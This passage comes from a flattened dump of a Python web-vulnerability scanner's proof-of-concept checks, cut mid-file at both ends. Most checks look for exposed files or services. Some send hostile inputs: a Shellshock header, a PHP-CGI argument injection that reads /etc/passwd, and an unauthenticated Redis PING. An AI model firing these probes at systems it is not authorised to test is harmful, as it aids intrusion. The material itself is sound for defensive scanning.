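            is_xml = req.headers.get("Content-Type") == "application/xml"
            # The original condition ended in a bare `and r"superadmin"`, which
            # is always true, so every XML response was reported; the marker is
            # now actually looked up in the body.
            if is_xml and r"superadmin" in req.text:
                cprint("[+]存在sgc8000监控系统超管账号泄露漏洞...(高危)\tpayload: "+vulnurl, "red")

        except Exception:
            # Best-effort: request failures are reported, but KeyboardInterrupt
            # and SystemExit are no longer swallowed.
            cprint("[-] "+__file__+"====>连接超时", "cyan")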
31 |
if __name__ == "__main__":
    # Script entry: argv[1] is the system base URL.
    warnings.filterwarnings("ignore")
    checker = sgc8000_defaultuser_disclosure_BaseVerify(sys.argv[1])
    checker.run()
--------------------------------------------------------------------------------
/pocs/industrial/sgc8000_deldata_config_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: sgc8000 监控系统数据连接信息泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0135197
6 | author: Lucifer
7 | description: 文件deldata_config.xml中,泄露了数据库连接信息。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
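class sgc8000_deldata_config_disclosure_BaseVerify:
    """Check whether deldata_config.xml of an sgc8000 system is publicly readable.

    A finding is printed when the file is served as "application/xml" and its
    body contains "databasesetup".
    """

    def __init__(self, url):
        # Base URL of the system; the file path is appended unchanged.
        self.url = url

    def run(self):
        """Request the XML file and print the outcome via cprint."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/app/deletessdata/config/deldata_config.xml"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificates are not validated for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # .get(): a response without Content-Type is "not affected" rather
            # than a KeyError misreported as a timeout.
            content_type = req.headers.get("Content-Type")
            if content_type == "application/xml" and r"databasesetup" in req.text:
                cprint("[+]存在sgc8000 监控系统数据连接信息泄露漏洞...(高危)\tpayload: "+vulnurl, "red")

        except Exception:
            # Best-effort: request failures are reported, but KeyboardInterrupt
            # and SystemExit are no longer swallowed.
            cprint("[-] "+__file__+"====>连接超时", "cyan")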
31 |
if __name__ == "__main__":
    # Script entry: argv[1] is the system base URL.
    warnings.filterwarnings("ignore")
    sgc8000_deldata_config_disclosure_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/industrial/sgc8000_sg8k_sms_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: sgc8000 大型旋转机监控系统报警短信模块泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0135197
6 | author: Lucifer
7 | description: 访问/sg8k_sms,未授权获取监控系统报警信息。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class sgc8000_sg8k_sms_disclosure_BaseVerify:
    """Check whether the sgc8000 alarm-SMS module is reachable without login.

    A finding is printed when /sg8k_sms returns a body containing "SG8000",
    "getMachineList" and "cancelSendMessage".
    """

    def __init__(self, url):
        # Base URL of the system; the module path is appended unchanged.
        self.url = url

    def run(self):
        """Request the module page and print the outcome via cprint."""
        vulnurl = self.url + "/sg8k_sms"
        request_headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: TLS certificates are not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            page_markers = (r"SG8000", r"getMachineList", r"cancelSendMessage")
            if all(marker in response.text for marker in page_markers):
                cprint("".join(("[+]存在sgc8000 大型旋转机监控系统报警短信模块泄露漏洞...(中危)\tpayload: ", vulnurl)), "yellow")

        except:
            # Any exception is reported as a timeout, whatever its real cause.
            cprint("".join(("[-] ", __file__, "====>连接超时")), "cyan")
31 |
if __name__ == "__main__":
    # Script entry: argv[1] is the system base URL.
    warnings.filterwarnings("ignore")
    checker = sgc8000_sg8k_sms_disclosure_BaseVerify(sys.argv[1])
    checker.run()
--------------------------------------------------------------------------------
/pocs/information/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/information/__init__.py
--------------------------------------------------------------------------------
/pocs/information/apache_server_status_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: apache server-status信息泄露
5 | referer: unknown
6 | author: Lucifer
7 | description: apache的状态信息文件泄露。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
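class apache_server_status_disclosure_BaseVerify:
    """Check whether Apache's /server-status page is publicly readable.

    A finding is printed when the response is HTTP 200 and the body contains
    both "Server uptime" and "Server Status".
    """

    def __init__(self, url):
        # Base URL of the web server; "/server-status" is appended unchanged.
        self.url = url

    def run(self):
        """Request the status page and print the outcome via cprint."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/server-status"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificates are not validated for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"Server uptime" in req.text and r"Server Status" in req.text and req.status_code==200:
                # The original message was copied from the git check and named
                # the wrong finding; it now names the server-status disclosure.
                cprint("[+]存在apache server-status信息泄露漏洞...(低危)\tpayload: "+vulnurl, "green")

        except Exception:
            # Best-effort: request failures are reported, but KeyboardInterrupt
            # and SystemExit are no longer swallowed.
            cprint("[-] "+__file__+"====>连接超时", "cyan")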
31 |
if __name__ == "__main__":
    # Script entry: argv[1] is the web server base URL.
    warnings.filterwarnings("ignore")
    apache_server_status_disclosure_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/information/crossdomain_find.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: crossdomain.xml文件发现
5 | referer: unknown
6 | author: Lucifer
7 | description: crossdomain错误配置可导致。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class crossdomain_find_BaseVerify:
    """Report the presence of a crossdomain.xml policy file.

    A finding is printed when /crossdomain.xml returns a body containing
    "allow-access-from". The policy's contents are not evaluated here.
    """

    def __init__(self, url):
        # Base URL of the site; "/crossdomain.xml" is appended unchanged.
        self.url = url

    def run(self):
        """Request the policy file and print the outcome via cprint."""
        vulnurl = self.url + "/crossdomain.xml"
        request_headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: TLS certificates are not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            # NOTE(review): the first marker is an empty string, which every
            # body contains, so only "allow-access-from" decides the result.
            # Presumably a tag name was lost from this literal - confirm.
            policy_markers = (r"", r"allow-access-from")
            if all(marker in response.text for marker in policy_markers):
                cprint("".join(("[+]存在crossdomain.xml文件发现漏洞...(信息)\tpayload: ", vulnurl)), "green")

        except:
            # Any exception is reported as a timeout, whatever its real cause.
            cprint("".join(("[-] ", __file__, "====>连接超时")), "cyan")
31 |
if __name__ == "__main__":
    # Script entry: argv[1] is the site base URL.
    warnings.filterwarnings("ignore")
    checker = crossdomain_find_BaseVerify(sys.argv[1])
    checker.run()
36 |
--------------------------------------------------------------------------------
/pocs/information/git_check.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: git源码泄露扫描
5 | referer: unknown
6 | author: Lucifer
7 | description: 忘记了删除.git目录而导致的漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class git_check_BaseVerify:
    """Check whether a site exposes its .git directory.

    A finding is printed when /.git/config answers with HTTP 200 and a body
    containing "repositoryformatversion". A positive result means the
    directory should be removed from, or blocked in, the web root.
    """

    def __init__(self, url):
        # Base URL of the site; "/.git/config" is appended unchanged.
        self.url = url

    def run(self):
        """Request the git config file and print the outcome via cprint."""
        vulnurl = self.url + "/.git/config"
        request_headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: TLS certificates are not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            looks_like_git_config = r"repositoryformatversion" in response.text
            if looks_like_git_config and response.status_code==200:
                cprint("".join(("[+]存在git源码泄露漏洞...(高危)\tpayload: ", vulnurl)), "red")

        except:
            # Any exception is reported as a timeout, whatever its real cause.
            cprint("".join(("[-] ", __file__, "====>连接超时")), "cyan")
31 |
if __name__ == "__main__":
    # Script entry: argv[1] is the site base URL.
    warnings.filterwarnings("ignore")
    git_check_BaseVerify(sys.argv[1]).run()
36 |
--------------------------------------------------------------------------------
/pocs/information/informationmain.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: information漏洞库
5 | referer: unknow
6 | author: Lucifer
7 | description: 包含所有information漏洞类型,封装成一个模块
8 | '''
9 | from information.springboot_api import springboot_api_BaseVerify
10 | from information.options_method import options_method_BaseVerify
11 | from information.robots_find import robots_find_BaseVerify
12 | from information.git_check import git_check_BaseVerify
13 | from information.jsp_conf_find import jsp_conf_find_BaseVerify
14 | from information.svn_check import svn_check_BaseVerify
15 | from information.jetbrains_ide_workspace_disclosure import jetbrains_ide_workspace_disclosure_BaseVerify
16 | from information.apache_server_status_disclosure import apache_server_status_disclosure_BaseVerify
17 | from information.crossdomain_find import crossdomain_find_BaseVerify
--------------------------------------------------------------------------------
/pocs/information/jsp_conf_find.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: java配置文件文件发现
5 | referer: unknow
6 | author: Lucifer
7 | description: web.xml是java框架使用的配置文件,可以获取敏感信息
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
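class jsp_conf_find_BaseVerify:
    """Check whether /WEB-INF/web.xml is served to web clients.

    A finding is printed when the response Content-Type is exactly
    "application/xml". Neither the status code nor the body is inspected, so
    any XML answer at that path is reported.
    """

    def __init__(self, url):
        # Base URL of the application; the file path is appended unchanged.
        self.url = url

    def run(self):
        """Request web.xml and print the outcome via cprint."""
        payload = "/WEB-INF/web.xml"
        vulnurl = self.url + payload
        try:
            # verify=False: TLS certificates are not validated for this request.
            req = requests.get(vulnurl, timeout=10, verify=False)
            # .get(): a response without Content-Type is "not affected" rather
            # than a KeyError misreported as a timeout.
            if req.headers.get("Content-Type") == "application/xml":
                cprint("[+]存在web.xml配置文件...(敏感信息)\tpayload: "+vulnurl, "green")

        except Exception:
            # Best-effort: request failures are reported, but KeyboardInterrupt
            # and SystemExit are no longer swallowed.
            cprint("[-] "+__file__+"====>连接超时", "cyan")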
28 |
if __name__ == "__main__":
    # Script entry: argv[1] is the application base URL.
    warnings.filterwarnings("ignore")
    checker = jsp_conf_find_BaseVerify(sys.argv[1])
    checker.run()
33 |
--------------------------------------------------------------------------------
/pocs/information/options_method.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: options方法开启
5 | referer: unknow
6 | author: Lucifer
7 | description: robots.txt是爬虫标准文件,可从文件里找到屏蔽了哪些爬虫搜索的目录
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
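class options_method_BaseVerify:
    """Report whether a server advertises the OPTIONS method.

    An OPTIONS request is sent to the base URL; a finding is printed, together
    with the advertised method list, when the Allow response header contains
    "OPTIONS".
    """

    def __init__(self, url):
        # URL that receives the OPTIONS request; nothing is appended to it.
        self.url = url

    def run(self):
        """Send the OPTIONS request and print the outcome via cprint."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        vulnurl = self.url
        try:
            # verify=False: TLS certificates are not validated for this request.
            req = requests.options(vulnurl, headers=headers, timeout=10, verify=False)

            # .get() with a default: servers that send no Allow header are
            # "not affected" rather than a KeyError misreported as a timeout.
            allowed = req.headers.get('Allow', '')
            if r"OPTIONS" in allowed:
                cprint("[+]存在options方法开启...(敏感信息)"+"\tpayload: "+vulnurl+"\tAllow:"+allowed, "green")
        except Exception:
            # Best-effort: request failures are reported, but KeyboardInterrupt
            # and SystemExit are no longer swallowed.
            cprint("[-] "+__file__+"====>连接超时", "cyan")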
30 |
if __name__ == "__main__":
    # Script entry: argv[1] is the URL to query.
    warnings.filterwarnings("ignore")
    options_method_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/information/robots_find.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: robots文件发现
5 | referer: unknow
6 | author: Lucifer
7 | description: robots.txt是爬虫标准文件,可从文件里找到屏蔽了哪些爬虫搜索的目录
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class robots_find_BaseVerify:
    """Report the presence of a robots.txt file.

    A finding is printed when /robots.txt returns a body containing
    "Disallow". The status code is not checked.
    """

    def __init__(self, url):
        # Base URL of the site; "/robots.txt" is appended unchanged.
        self.url = url

    def run(self):
        """Request robots.txt and print the outcome via cprint."""
        vulnurl = self.url + "/robots.txt"
        try:
            # No custom headers here; verify=False skips TLS validation.
            response = requests.get(vulnurl, timeout=10, verify=False)

            if "Disallow" not in response.text:
                return
            cprint("".join(("[+]存在robots.txt爬虫文件...(敏感信息)", "\tpayload: ", vulnurl)), "green")
        except:
            # Any exception is reported as a timeout, whatever its real cause.
            cprint("".join(("[-] ", __file__, "====>连接超时")), "cyan")
28 |
if __name__ == "__main__":
    # Script entry: argv[1] is the site base URL.
    warnings.filterwarnings("ignore")
    checker = robots_find_BaseVerify(sys.argv[1])
    checker.run()
33 |
--------------------------------------------------------------------------------
/pocs/information/springboot_api.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: spring boot 路径泄露
5 | referer: http://blog.csdn.net/u011687186/article/details/73457498
6 | author: Lucifer
7 | description: robots.txt是爬虫标准文件,可从文件里找到屏蔽了哪些爬虫搜索的目录
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class springboot_api_BaseVerify:
    """Check whether a Spring Boot /mappings endpoint is publicly readable.

    A finding is printed when the body contains both "resourceHandlerMapping"
    and "springframework.boot.actuate". A positive result means the endpoint
    should be disabled or placed behind authentication.
    """

    def __init__(self, url):
        # Base URL of the application; "/mappings" is appended unchanged.
        self.url = url

    def run(self):
        """Request the mappings endpoint and print the outcome via cprint."""
        vulnurl = self.url + "/mappings"
        try:
            # No custom headers here; verify=False skips TLS validation.
            response = requests.get(vulnurl, timeout=10, verify=False)

            actuator_markers = ("resourceHandlerMapping", r"springframework.boot.actuate")
            if all(marker in response.text for marker in actuator_markers):
                cprint("".join(("[+]存在spring boot api路径泄露...(敏感信息)", "\tpayload: ", vulnurl)), "green")
        except:
            # Any exception is reported as a timeout, whatever its real cause.
            cprint("".join(("[-] ", __file__, "====>连接超时")), "cyan")
28 |
if __name__ == "__main__":
    # Script entry: argv[1] is the application base URL.
    warnings.filterwarnings("ignore")
    springboot_api_BaseVerify(sys.argv[1]).run()
33 |
--------------------------------------------------------------------------------
/pocs/system/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/__init__.py
--------------------------------------------------------------------------------
/pocs/system/bash/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/bash/__init__.py
--------------------------------------------------------------------------------
/pocs/system/bash/shellshock.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: shellshock漏洞
5 | referer: http://drops.wooyun.org/papers/3268
6 | author: Lucifer
7 | description: 在bash 1.14至bash 4.3的Linux/Unix系统版本中,bash在处理某些构造的环境变量时存在安全漏洞,
8 | 向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统
9 | '''
10 | import sys
11 | import warnings
12 | import requests
13 | from termcolor import cprint
14 |
class shellshock_BaseVerify:
    """Check a URL for the bash environment-variable flaw known as Shellshock.

    One GET is sent with a crafted User-agent value; a finding is printed when
    the response carries a header named "Shellshock". A positive result means
    bash on the host needs to be patched.
    """

    def __init__(self, url):
        # URL to test; an empty suffix is appended, so it is used as given.
        self.url = url

    def run(self):
        """Send the probe request and print the outcome via cprint."""
        payload = ""
        vulnurl = self.url + payload
        request_headers = {
            "User-agent":'() { :;}; echo \"Shellshock: Server Vulnerable\"',
            "Accept":"text/plain",
            "Content-type":"application/x-www-form-urlencoded"
        }
        try:
            # verify=False: TLS certificates are not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)

            # Membership on the header mapping tests header names, so this asks
            # whether the echoed line came back as a response header.
            marker_present = r"Shellshock" in response.headers
            if marker_present:
                cprint("".join(("[+]存在shellshock漏洞...(高危)\tpayload: ", vulnurl)), "red")
        except:
            # Any exception is reported as a timeout, whatever its real cause.
            cprint("".join(("[-] ", __file__, "====>连接超时")), "cyan")
34 |
if __name__ == "__main__":
    # Script entry: argv[1] is the URL to test.
    warnings.filterwarnings("ignore")
    checker = shellshock_BaseVerify(sys.argv[1])
    checker.run()
39 |
--------------------------------------------------------------------------------
/pocs/system/couchdb/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/couchdb/__init__.py
--------------------------------------------------------------------------------
/pocs/system/dorado/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/dorado/__init__.py
--------------------------------------------------------------------------------
/pocs/system/glassfish/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/glassfish/__init__.py
--------------------------------------------------------------------------------
/pocs/system/goahead/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/goahead/__init__.py
--------------------------------------------------------------------------------
/pocs/system/goahead/bin/goahead_payload.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/goahead/bin/goahead_payload.so
--------------------------------------------------------------------------------
/pocs/system/hfs/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/hfs/__init__.py
--------------------------------------------------------------------------------
/pocs/system/hudson/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/hudson/__init__.py
--------------------------------------------------------------------------------
/pocs/system/hudson/hudson_ws_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: hudson源代码泄露漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0103484
6 | author: Lucifer
7 | description: 一种新型的漏洞Hudson利用方式,不用破解密码,不用代码执行,直接查看任意代码。访问项目页面访问不到源代码,我们后面直接加入/ws/即可访问和下载所有代码。
8 | '''
9 | import sys
10 | import warnings
11 | import requests
12 | from termcolor import cprint
13 |
class hudson_ws_disclosure_BaseVerify:
    """Check whether a Hudson job workspace is browsable without login.

    A finding is printed when the workspace listing of the hard-coded job
    "crm" returns a body containing ".svn". Other job names are not tried.
    """

    def __init__(self, url):
        # Base URL of the server; the workspace path is appended unchanged.
        self.url = url

    def run(self):
        """Request the workspace listing and print the outcome via cprint."""
        vulnurl = self.url + "/hudson/job/crm/ws/"
        request_headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: TLS certificates are not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if r".svn" not in response.text:
                return
            # A bare substring match; the status code is not checked.
            cprint("".join(("[+]存在hudson源代码泄露漏洞...(中危)\tpayload: ", vulnurl)), "yellow")

        except:
            # Any exception is reported as a timeout, whatever its real cause.
            cprint("".join(("[-] ", __file__, "====>连接超时")), "cyan")
31 |
if __name__ == "__main__":
    # Script entry: argv[1] is the server base URL.
    warnings.filterwarnings("ignore")
    hudson_ws_disclosure_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/system/iis/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/iis/__init__.py
--------------------------------------------------------------------------------
/pocs/system/intel/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/intel/__init__.py
--------------------------------------------------------------------------------
/pocs/system/kinggate/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/kinggate/__init__.py
--------------------------------------------------------------------------------
/pocs/system/mongodb/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/mongodb/__init__.py
--------------------------------------------------------------------------------
/pocs/system/nginx/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/nginx/__init__.py
--------------------------------------------------------------------------------
/pocs/system/others/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/others/__init__.py
--------------------------------------------------------------------------------
/pocs/system/others/forease_fileinclude_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 实易DNS管理系统文件包含至远程代码执行
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0122543
6 | author: Lucifer
7 | description: 实易智能DNS管理系统,php CGI远程代码执行,文件包含。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
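class forease_fileinclude_code_exec_BaseVerify():
    """Check a Forease (实易) DNS management system for a PHP-CGI file include.

    The check sends one GET request whose query string sets the PHP
    ``auto_prepend_file`` directive to ``/etc/passwd`` and reports a finding
    when the response contains both ``root:`` and ``/bin/bash``. The file's
    header describes the issue as a php CGI remote code execution and file
    inclusion.

    Defender note: a hit means the PHP handler accepts configuration
    directives from the query string. Presumably the remedy is a patched PHP
    build and not exposing the CGI binary to request-supplied arguments;
    confirm against the vendor advisory.
    """

    def __init__(self, url):
        """Remember the base URL (scheme and host) the check will be run against."""
        self.url = url

    def run(self):
        """Send the probe and print a finding if the passwd file is echoed back.

        Prints a red "[+]" line on a match and a cyan "[-]" line when the
        request fails; returns None in every case.
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/index.php?-dauto_prepend_file%3d/etc/passwd"
        vulnurl = self.url + payload
        try:
            # verify=False turns off TLS certificate validation, so the answer
            # may come from any host able to intercept the connection.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)

            # Both markers must be present; a host with no bash login shell
            # would not match even if the file was included.
            if r"root:" in req.text and r"/bin/bash" in req.text:
                cprint("[+]存在实易DNS管理系统文件包含漏洞...(高危)\tpayload: "+vulnurl, "red")

        # Exception instead of a bare except, so Ctrl-C and SystemExit still
        # stop the run. The message says "connection timeout" but is printed
        # for every kind of failure.
        except Exception:
            cprint("[-] "+__file__+"====>连接超时", "cyan")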
32 |
if __name__ == "__main__":
    # Command-line use: the first argument is the base URL to check.
    # All warnings are silenced, which also hides the warning normally
    # emitted for requests made with certificate verification turned off.
    warnings.filterwarnings("ignore")
    forease_fileinclude_code_exec_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/system/php/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/php/__init__.py
--------------------------------------------------------------------------------
/pocs/system/php/php_expose_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: php expose_php模块开启
5 | referer: http://blog.csdn.net/change518/article/details/39892449
6 | author: Lucifer
7 | description: 开启了expose_php模块。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
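class php_expose_disclosure_BaseVerify:
    """Check whether a PHP site answers the ``expose_php`` credits query.

    The check requests ``/index.php`` with a fixed GUID-style query string and
    reports an informational finding when the response mentions both
    ``XMLWriter`` and ``phpinfo``.

    Defender note: the finding is information disclosure only (it reveals that
    PHP is in use and details about the build). Setting ``expose_php = Off``
    in php.ini is the usual remedy.
    """

    def __init__(self, url):
        """Remember the base URL (scheme and host) the check will be run against."""
        self.url = url

    def run(self):
        """Send one GET request and print a finding if the credits page comes back.

        Prints a green "[+]" line on a match and a cyan "[-]" line when the
        request fails; returns None in every case.
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000"
        vulnurl = self.url + payload
        try:
            # verify=False turns off TLS certificate validation, so the answer
            # may come from any host able to intercept the connection.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Substring match only: an ordinary page that happens to contain
            # both words would also be reported.
            if r"XMLWriter" in req.text and r"phpinfo" in req.text:
                cprint("[+]存在php expose_php模块开启...(信息)\tpayload: "+vulnurl, "green")

        # Exception instead of a bare except, so Ctrl-C and SystemExit still
        # stop the run. The message says "connection timeout" but is printed
        # for every kind of failure.
        except Exception:
            cprint("[-] "+__file__+"====>连接超时", "cyan")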
31 |
if __name__ == "__main__":
    # Command-line use: the first argument is the base URL to check.
    # All warnings are silenced, which also hides the warning normally
    # emitted for requests made with certificate verification turned off.
    warnings.filterwarnings("ignore")
    php_expose_disclosure_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/system/redis/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/system/redis/__init__.py
--------------------------------------------------------------------------------
/pocs/system/redis/redis_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: redis 未授权漏洞
5 | referer: unknown
6 | author: Lucifer
7 | description: redis无用户名密码可直接远程操纵。
8 | '''
9 | import sys
10 | import redis
11 | import warnings
12 | from termcolor import cprint
13 | from urllib.parse import urlparse
14 |
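class redis_unauth_BaseVerify:
    """Check whether a Redis server answers PING without credentials.

    The target may be given as an ``http...`` URL, from which the host and an
    optional port are taken, or as a bare host name, which is used as-is with
    the default port 6379.

    Defender note: a finding means anyone who can reach the port can read and
    change the data store. The usual remedies are setting ``requirepass`` (or
    ACLs), binding the server to a private interface with ``bind``, keeping
    ``protected-mode`` enabled, and firewalling the port.
    """

    def __init__(self, url):
        """Remember the target, either a URL or a bare host name."""
        self.url = url

    def run(self):
        """Connect, send PING, and print a finding if the server replies.

        Prints a red "[+]" line when PING succeeds and a cyan "[-]" line when
        the connection or the command fails; returns None in every case.
        """
        port = 6379
        # Substring test, not a scheme check: any target containing "http" is
        # treated as a URL.
        if r"http" in self.url:
            # Take the network location (host[:port]) out of the URL.
            host = urlparse(self.url)[1]
            try:
                port = int(host.split(':')[1])
            except (IndexError, ValueError):
                # No port given, or not a number: keep the default.
                pass
            flag = host.find(":")
            if flag != -1:
                host = host[:flag]
        else:
            host = self.url

        try:
            r = redis.Redis(host, port=port, db=0, socket_timeout=6.0)
            if r.ping() is True:
                cprint("[+]存在redis 未授权漏洞...(高危)\tpayload: "+host+":"+str(port), "red")

        # Exception instead of a bare except, so Ctrl-C and SystemExit still
        # stop the run. The message says "connection timeout" but is printed
        # for every kind of failure, presumably including a server that
        # refuses the command because it requires authentication.
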